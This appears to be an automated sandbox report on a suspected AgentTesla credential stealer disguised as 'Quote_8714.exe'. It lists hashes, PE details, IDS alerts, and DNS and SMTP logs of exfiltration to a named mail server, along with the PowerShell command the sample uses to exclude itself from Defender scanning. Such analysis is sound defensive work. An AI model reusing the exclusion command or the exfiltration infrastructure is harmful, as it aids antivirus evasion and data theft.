SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	high, very likely benign file
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_e43ech1r.hl4.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lidrmltf.ygb.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ysu0wl3r.bhc.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.626282386889262
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	Quote_8714.exe
File size:	679'936 bytes
MD5:	aab6786b56cd4bebf107aa1f00d680c4
SHA1:	785459ff067ac23f52789e7d0b36084186864dcb
SHA256:	e834cc0db159080a88d07c5e1c843905f7eb1f3b0b48ad1c5377f159fcb5e5f0
SHA512:	dba476bfb622f69b3cbd56e4b0d063f147de1291d2f8033ec0bdcfeb8ee8146b97e57331623c70a4f54423ce06b2c554be25d94cda841c948fc9fa8a25b2313f
SSDEEP:	12288:OgdY9shQgMYtaeuO+WEHCdQ+ULZuv73Dmswejx5wDYnD0Lb8hKwskGJ:bdhlvtl+WEvFZuv73R9jx5mYD0ccwsk
TLSH:	22E4F164BB5EC517C98517354E62E6B8216C9E9DF813D2039EECBFBF7D72A141C08282
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...,UVg..............0..6...(......"U... ...`....@.. ....................................@................................

File Icon


Icon Hash:	17692632b3936907

Static PE Info

General

Entrypoint:	0x4a5522
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x6756552C [Mon Dec 9 02:25:48 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
push ebx
add byte ptr [ecx+00h], bh
jnc 00007FE5350EAA12h
je 00007FE5350EAA12h
add byte ptr [ebp+00h], ch
add byte ptr [ecx+00h], al
arpl word ptr [eax], ax
je 00007FE5350EAA12h
imul eax, dword ptr [eax], 00610076h
je 00007FE5350EAA12h
outsd
add byte ptr [edx+00h], dh
push ebx
add byte ptr [ecx+00h], bh
jnc 00007FE5350EAA12h
je 00007FE5350EAA12h
add byte ptr [ebp+00h], ch
add byte ptr [edx+00h], dl
add byte ptr [esi+00h], ah
insb
add byte ptr [ebp+00h], ah
arpl word ptr [eax], ax
je 00007FE5350EAA12h
imul eax, dword ptr [eax], 006E006Fh
add byte ptr [ecx+00h], al
jnc 00007FE5350EAA12h
jnc 00007FE5350EAA12h
add byte ptr [ebp+00h], ch
bound eax, dword ptr [eax]
insb
add byte ptr [ecx+00h], bh
add byte ptr [eax], al
add byte ptr [eax], al
dec esp
add byte ptr [edi+00h], ch
popad
add byte ptr [eax+eax+00h], ah
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xa54d0	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xa6000	0x2494	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xaa000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0xa3588	0xa3600	e73928ff3dddec3439188765110dd85c	False	0.888609111993114	data	7.6318451005062595	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0xa6000	0x2494	0x2600	3b1ffc4f53c1dd36a50c56a85ffa623b	False	0.8694490131578947	data	7.40351933902684	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xaa000	0xc	0x200	e844be7c5ea9163b4a5b9a3498f3f0d7	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	ZLIB Complexity
RT_ICON	0xa6100	0x1e7e	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	0.9827056110684089
RT_GROUP_ICON	0xa7f90	0x14	data	1.05
RT_VERSION	0xa7fb4	0x2e0	data	0.452445652173913
RT_MANIFEST	0xa82a4	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators	0.5489795918367347

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-09T06:52:18.315528+0100	2855245	ETPRO MALWARE Agent Tesla Exfil via SMTP	1	192.168.2.4	49735	199.79.62.115	587	TCP
2024-12-09T06:52:18.315528+0100	2855542	ETPRO MALWARE Agent Tesla CnC Exfil Activity	1	192.168.2.4	49735	199.79.62.115	587	TCP
2024-12-09T06:53:52.010600+0100	2030171	ET MALWARE AgentTesla Exfil Via SMTP	1	192.168.2.4	49735	199.79.62.115	587	TCP
2024-12-09T06:53:52.010600+0100	2839723	ETPRO MALWARE Win32/Agent Tesla SMTP Activity	1	192.168.2.4	49735	199.79.62.115	587	TCP
2024-12-09T06:53:52.010600+0100	2840032	ETPRO MALWARE Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2	1	192.168.2.4	49735	199.79.62.115	587	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 9, 2024 06:52:14.683379889 CET	49735	587	192.168.2.4	199.79.62.115
Dec 9, 2024 06:52:14.802700996 CET	587	49735	199.79.62.115	192.168.2.4
Dec 9, 2024 06:52:14.803548098 CET	49735	587	192.168.2.4	199.79.62.115
Dec 9, 2024 06:52:16.031785965 CET	587	49735	199.79.62.115	192.168.2.4
Dec 9, 2024 06:52:16.032668114 CET	49735	587	192.168.2.4	199.79.62.115
Dec 9, 2024 06:52:16.152095079 CET	587	49735	199.79.62.115	192.168.2.4
Dec 9, 2024 06:52:16.398808002 CET	587	49735	199.79.62.115	192.168.2.4
Dec 9, 2024 06:52:16.399776936 CET	49735	587	192.168.2.4	199.79.62.115
Dec 9, 2024 06:52:16.519192934 CET	587	49735	199.79.62.115	192.168.2.4
Dec 9, 2024 06:52:16.765840054 CET	587	49735	199.79.62.115	192.168.2.4
Dec 9, 2024 06:52:16.766165972 CET	49735	587	192.168.2.4	199.79.62.115
Dec 9, 2024 06:52:16.885551929 CET	587	49735	199.79.62.115	192.168.2.4
Dec 9, 2024 06:52:17.199697971 CET	587	49735	199.79.62.115	192.168.2.4
Dec 9, 2024 06:52:17.203876972 CET	49735	587	192.168.2.4	199.79.62.115
Dec 9, 2024 06:52:17.323374987 CET	587	49735	199.79.62.115	192.168.2.4
Dec 9, 2024 06:52:17.569897890 CET	587	49735	199.79.62.115	192.168.2.4
Dec 9, 2024 06:52:17.570204973 CET	49735	587	192.168.2.4	199.79.62.115
Dec 9, 2024 06:52:17.689640045 CET	587	49735	199.79.62.115	192.168.2.4
Dec 9, 2024 06:52:17.943624020 CET	587	49735	199.79.62.115	192.168.2.4
Dec 9, 2024 06:52:17.948589087 CET	49735	587	192.168.2.4	199.79.62.115
Dec 9, 2024 06:52:18.068145990 CET	587	49735	199.79.62.115	192.168.2.4
Dec 9, 2024 06:52:18.314745903 CET	587	49735	199.79.62.115	192.168.2.4
Dec 9, 2024 06:52:18.315293074 CET	49735	587	192.168.2.4	199.79.62.115
Dec 9, 2024 06:52:18.315527916 CET	49735	587	192.168.2.4	199.79.62.115
Dec 9, 2024 06:52:18.315527916 CET	49735	587	192.168.2.4	199.79.62.115
Dec 9, 2024 06:52:18.315527916 CET	49735	587	192.168.2.4	199.79.62.115
Dec 9, 2024 06:52:18.434612989 CET	587	49735	199.79.62.115	192.168.2.4
Dec 9, 2024 06:52:18.434791088 CET	587	49735	199.79.62.115	192.168.2.4
Dec 9, 2024 06:52:18.434909105 CET	587	49735	199.79.62.115	192.168.2.4
Dec 9, 2024 06:52:18.434947014 CET	587	49735	199.79.62.115	192.168.2.4
Dec 9, 2024 06:52:18.776746988 CET	587	49735	199.79.62.115	192.168.2.4
Dec 9, 2024 06:52:18.817523003 CET	49735	587	192.168.2.4	199.79.62.115
Dec 9, 2024 06:53:51.443681955 CET	49735	587	192.168.2.4	199.79.62.115
Dec 9, 2024 06:53:51.563122034 CET	587	49735	199.79.62.115	192.168.2.4
Dec 9, 2024 06:53:52.010400057 CET	587	49735	199.79.62.115	192.168.2.4
Dec 9, 2024 06:53:52.010550976 CET	587	49735	199.79.62.115	192.168.2.4
Dec 9, 2024 06:53:52.010557890 CET	49735	587	192.168.2.4	199.79.62.115
Dec 9, 2024 06:53:52.010600090 CET	49735	587	192.168.2.4	199.79.62.115
Dec 9, 2024 06:53:52.129771948 CET	587	49735	199.79.62.115	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 9, 2024 06:52:11.430202007 CET	58631	53	192.168.2.4	1.1.1.1
Dec 9, 2024 06:52:12.427118063 CET	58631	53	192.168.2.4	1.1.1.1
Dec 9, 2024 06:52:13.442869902 CET	58631	53	192.168.2.4	1.1.1.1
Dec 9, 2024 06:52:14.675540924 CET	53	58631	1.1.1.1	192.168.2.4
Dec 9, 2024 06:52:14.675556898 CET	53	58631	1.1.1.1	192.168.2.4
Dec 9, 2024 06:52:14.675566912 CET	53	58631	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 9, 2024 06:52:11.430202007 CET	192.168.2.4	1.1.1.1	0x362e	Standard query (0)	mail.mbarieservicesltd.com	A (IP address)	IN (0x0001)	false
Dec 9, 2024 06:52:12.427118063 CET	192.168.2.4	1.1.1.1	0x362e	Standard query (0)	mail.mbarieservicesltd.com	A (IP address)	IN (0x0001)	false
Dec 9, 2024 06:52:13.442869902 CET	192.168.2.4	1.1.1.1	0x362e	Standard query (0)	mail.mbarieservicesltd.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Dec 9, 2024 06:52:14.675540924 CET	1.1.1.1	192.168.2.4	0x362e	No error (0)	mail.mbarieservicesltd.com	199.79.62.115	A (IP address)	IN (0x0001)	false
Dec 9, 2024 06:52:14.675556898 CET	1.1.1.1	192.168.2.4	0x362e	No error (0)	mail.mbarieservicesltd.com	199.79.62.115	A (IP address)	IN (0x0001)	false
Dec 9, 2024 06:52:14.675566912 CET	1.1.1.1	192.168.2.4	0x362e	No error (0)	mail.mbarieservicesltd.com	199.79.62.115	A (IP address)	IN (0x0001)	false

SMTP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP	Commands
Dec 9, 2024 06:52:16.031785965 CET	587	49735	199.79.62.115	192.168.2.4	220-md-54.webhostbox.net ESMTP Exim 4.96.2 #2 Mon, 09 Dec 2024 11:22:15 +0530 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Dec 9, 2024 06:52:16.032668114 CET	49735	587	192.168.2.4	199.79.62.115	EHLO 767668
Dec 9, 2024 06:52:16.398808002 CET	587	49735	199.79.62.115	192.168.2.4	250-md-54.webhostbox.net Hello 767668 [8.46.123.228] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-AUTH PLAIN LOGIN 250-STARTTLS 250 HELP
Dec 9, 2024 06:52:16.399776936 CET	49735	587	192.168.2.4	199.79.62.115	AUTH login c2FsZXNzQG1iYXJpZXNlcnZpY2VzbHRkLmNvbQ==
Dec 9, 2024 06:52:16.765840054 CET	587	49735	199.79.62.115	192.168.2.4	334 UGFzc3dvcmQ6
Dec 9, 2024 06:52:17.199697971 CET	587	49735	199.79.62.115	192.168.2.4	235 Authentication succeeded
Dec 9, 2024 06:52:17.203876972 CET	49735	587	192.168.2.4	199.79.62.115	MAIL FROM:<saless@mbarieservicesltd.com>
Dec 9, 2024 06:52:17.569897890 CET	587	49735	199.79.62.115	192.168.2.4	250 OK
Dec 9, 2024 06:52:17.570204973 CET	49735	587	192.168.2.4	199.79.62.115	RCPT TO:<iinfo@mbarieservicesltd.com>
Dec 9, 2024 06:52:17.943624020 CET	587	49735	199.79.62.115	192.168.2.4	250 Accepted
Dec 9, 2024 06:52:17.948589087 CET	49735	587	192.168.2.4	199.79.62.115	DATA
Dec 9, 2024 06:52:18.314745903 CET	587	49735	199.79.62.115	192.168.2.4	354 Enter message, ending with "." on a line by itself
Dec 9, 2024 06:52:18.315527916 CET	49735	587	192.168.2.4	199.79.62.115	.
Dec 9, 2024 06:52:18.776746988 CET	587	49735	199.79.62.115	192.168.2.4	250 OK id=1tKWgs-002mj2-0P
Dec 9, 2024 06:53:51.443681955 CET	49735	587	192.168.2.4	199.79.62.115	QUIT
Dec 9, 2024 06:53:52.010400057 CET	587	49735	199.79.62.115	192.168.2.4	221 md-54.webhostbox.net closing connection

Target ID:	0
Start time:	00:52:03
Start date:	09/12/2024
Path:	C:\Users\user\Desktop\Quote_8714.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Quote_8714.exe"
Imagebase:	0x5f0000
File size:	679'936 bytes
MD5 hash:	AAB6786B56CD4BEBF107AA1F00D680C4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000000.00000002.1749716667.0000000003A59000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	00:52:06
Start date:	09/12/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Quote_8714.exe"
Imagebase:	0x3c0000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	00:52:06
Start date:	09/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	00:52:08
Start date:	09/12/2024
Path:	C:\Windows\System32\wbem\WmiPrvSE.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Imagebase:	0x7ff693ab0000
File size:	496'640 bytes
MD5 hash:	60FF40CFD7FB8FE41EE4FE9AE5FE1C51
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	00:52:08
Start date:	09/12/2024
Path:	C:\Users\user\Desktop\Quote_8714.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Quote_8714.exe"
Imagebase:	0x5c0000
File size:	679'936 bytes
MD5 hash:	AAB6786B56CD4BEBF107AA1F00D680C4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.2942693861.0000000002ADA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000005.00000002.2940203488.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.2942693861.0000000002A81000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.2942693861.0000000002A81000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	11.5%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	1.7%
Total number of Nodes:	405
Total number of Limit Nodes:	24

Executed Functions

Function 04F276C8 Relevance: 14.5, Strings: 11, Instructions: 727
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

(, xrefs: 04F27B36
(, xrefs: 04F27B3D
), xrefs: 04F27D1B
), xrefs: 04F27D77
4'^q, xrefs: 04F276E2
), xrefs: 04F27E91
), xrefs: 04F27E2F
), xrefs: 04F27DD3
HUi, xrefs: 04F27A5C
., xrefs: 04F27CA0
(, xrefs: 04F27F2C

Memory Dump Source

Source File: 00000000.00000002.1750995917.0000000004F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4f20000_Quote_8714.jbxd

Similarity

API ID:
String ID: ($($($)$)$)$)$)$.$4'^q$HUi
API String ID: 0-3485644114
Opcode ID: 0d099541b0f6c599eb3df6a3767e4187d3c6f04e17de53b4aafb26eca55a3ef5
Instruction ID: d397331da70c584ca4a98fc23d6ffb6511e75dfca5b5c8c7fdfac56cd2512cfb
Opcode Fuzzy Hash: 0d099541b0f6c599eb3df6a3767e4187d3c6f04e17de53b4aafb26eca55a3ef5
Instruction Fuzzy Hash: 17626E30A00715CFD704EF74C994B9AB7B2FF89304F1486A9D8096F365DB75A98ACB90

Function 04F276B8 Relevance: 14.4, Strings: 11, Instructions: 678
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

(, xrefs: 04F27B36
(, xrefs: 04F27B3D
), xrefs: 04F27D1B
), xrefs: 04F27D77
4'^q, xrefs: 04F276E2
), xrefs: 04F27E91
), xrefs: 04F27E2F
), xrefs: 04F27DD3
HUi, xrefs: 04F27A5C
., xrefs: 04F27CA0
(, xrefs: 04F27F2C

Memory Dump Source

Source File: 00000000.00000002.1750995917.0000000004F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4f20000_Quote_8714.jbxd

Similarity

API ID:
String ID: ($($($)$)$)$)$)$.$4'^q$HUi
API String ID: 0-3485644114
Opcode ID: 92257a26ff4d80d5c5cd2b48426a3822a31b8ddbc6c06426542f7dc397dc8977
Instruction ID: 7fefde6ffa7239cc3d5366dc102d57abcf2fc9e7492de3886fb6aed1670db167
Opcode Fuzzy Hash: 92257a26ff4d80d5c5cd2b48426a3822a31b8ddbc6c06426542f7dc397dc8977
Instruction Fuzzy Hash: A8526C30A00715CFDB04EF74C994A99B7B2FF89304F1586B8D8096F365DB75A98ACB90

Function 0B267610 Relevance: 1.7, Strings: 1, Instructions: 428COMMON

Download Yara Rule

Strings

Hbq, xrefs: 0B267692

Memory Dump Source

Source File: 00000000.00000002.1756959929.000000000B260000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b260000_Quote_8714.jbxd

Similarity

API ID:
String ID: Hbq
API String ID: 0-1245868
Opcode ID: ea9d02bf2053927ff4f1234dd1826c9923f6d2e9aba0e36d4117d26e73bbaa41
Instruction ID: c8337ca813ae18c6b3b711e01832b650aaa56b16da6d7ba22cb9aa607e658958
Opcode Fuzzy Hash: ea9d02bf2053927ff4f1234dd1826c9923f6d2e9aba0e36d4117d26e73bbaa41
Instruction Fuzzy Hash: F5E1DB707016028FDB1AEB79D4A07AEB7EAAFC8644F14446DC58A9B3A0CF34ED41CB51

Function 04FFE190 Relevance: .7, Instructions: 651COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1751074095.0000000004FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4ff0000_Quote_8714.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1171c716bc60d74b8db7dc5eba8357bab2208db76429bd7969c0562ec598fb76
Instruction ID: 777a9648ccae16837a52b9014d1f2675be0841cd9cb7b3bdd417bdb53102930d
Opcode Fuzzy Hash: 1171c716bc60d74b8db7dc5eba8357bab2208db76429bd7969c0562ec598fb76
Instruction Fuzzy Hash: 0442D534711200CFD7589B78C59866D7BB2BF89305B2148BDE646DB3B4DB36A882CF54

Function 0BCAD8B0 Relevance: .6, Instructions: 635COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1757712530.000000000BCA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BCA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bca0000_Quote_8714.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 725cba5cf185e7e6559bc9d520ec9347b703fec27598bb648b2419e0d475107e
Instruction ID: 4dbeaaa84d147821a968ca8a4c0c61803ff02f84131d82ae8ebc2b3f74f16c4b
Opcode Fuzzy Hash: 725cba5cf185e7e6559bc9d520ec9347b703fec27598bb648b2419e0d475107e
Instruction Fuzzy Hash: 64526B3591161ACFCB21DF65CC44AE9B7B1FF49304F1485E9E549AB261EB31EA82CF40

Function 0B260040 Relevance: .5, Instructions: 514COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1756959929.000000000B260000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b260000_Quote_8714.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3f9794f743becccd0d8bcd63ffd3c990d668d1c38a79aae5aef8713a4dbaaf4b
Instruction ID: 6c7bcbfb28d5bf1181affe6ff0dc6c6348e9fcc6d01dc6450d80d12bad2c593e
Opcode Fuzzy Hash: 3f9794f743becccd0d8bcd63ffd3c990d668d1c38a79aae5aef8713a4dbaaf4b
Instruction Fuzzy Hash: 2532393591061ACFDB21DF64C984BDAB7B1FF89304F1085E9E509AB261EB70AAC5DF40

Function 0BCA58C0 Relevance: .4, Instructions: 361COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1757712530.000000000BCA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BCA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bca0000_Quote_8714.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3d88d62c0318303a73a3f6417eca2d0b20d0dee9dcdd59dbb62f3823ac665a6f
Instruction ID: 9ae87bb02c6b4c1585017ab7eb99990210c6a7cc3a741fd19058d992b2553eaa
Opcode Fuzzy Hash: 3d88d62c0318303a73a3f6417eca2d0b20d0dee9dcdd59dbb62f3823ac665a6f
Instruction Fuzzy Hash: 73E16B70E1020ACFDB14DFA9D988BADBBF1BF58308F15C169E405AF2A5DB74A945CB40

Function 04F25A52 Relevance: .2, Instructions: 176COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1750995917.0000000004F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4f20000_Quote_8714.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 83c18307bc50e5ec0b02d9ee81cde26822162f7bf0c6631f3112f792d178de76
Instruction ID: 6097c6f54e5eb8dfca3595293d42941f34d8ba9ab3f6a265705d98a9321cf345
Opcode Fuzzy Hash: 83c18307bc50e5ec0b02d9ee81cde26822162f7bf0c6631f3112f792d178de76
Instruction Fuzzy Hash: 43612935E0032ADFDB04EFA0CA509DEBBF6FF89304B645165D409AB264EB30AD46CB50

Function 07236E47 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1755955400.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7230000_Quote_8714.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e7ba9a7a1e617edb1771d0dab76367c813758c9136fb7e9a18d21143d88313ae
Instruction ID: 06c0ba220cec5828cd505226e40936b843a933f503223000c2c39b9929369a7d
